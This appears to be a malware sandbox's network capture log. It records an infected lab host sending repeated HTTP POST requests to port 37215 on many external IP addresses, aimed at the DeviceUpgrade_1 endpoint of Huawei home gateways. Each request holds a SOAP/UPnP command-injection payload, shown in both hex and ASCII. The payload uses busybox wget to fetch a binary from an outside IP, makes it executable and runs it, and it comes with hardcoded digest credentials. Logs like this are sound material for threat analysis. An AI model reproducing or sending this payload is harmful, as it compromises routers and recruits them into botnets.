                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2340192.168.2.1540574157.150.90.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469244003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2341192.168.2.1554166157.233.4.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469258070 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2342192.168.2.1542858186.225.93.13437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469326019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2343192.168.2.1558872186.105.56.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469338894 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2344192.168.2.1559470222.97.44.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469371080 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2345192.168.2.1541882157.84.54.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469388962 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2346192.168.2.1553692186.217.199.5037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469403028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2347192.168.2.154048494.116.22.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469419956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2348192.168.2.1537704222.102.183.6337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469435930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2349192.168.2.1542132176.66.11.537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:23.469449997 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
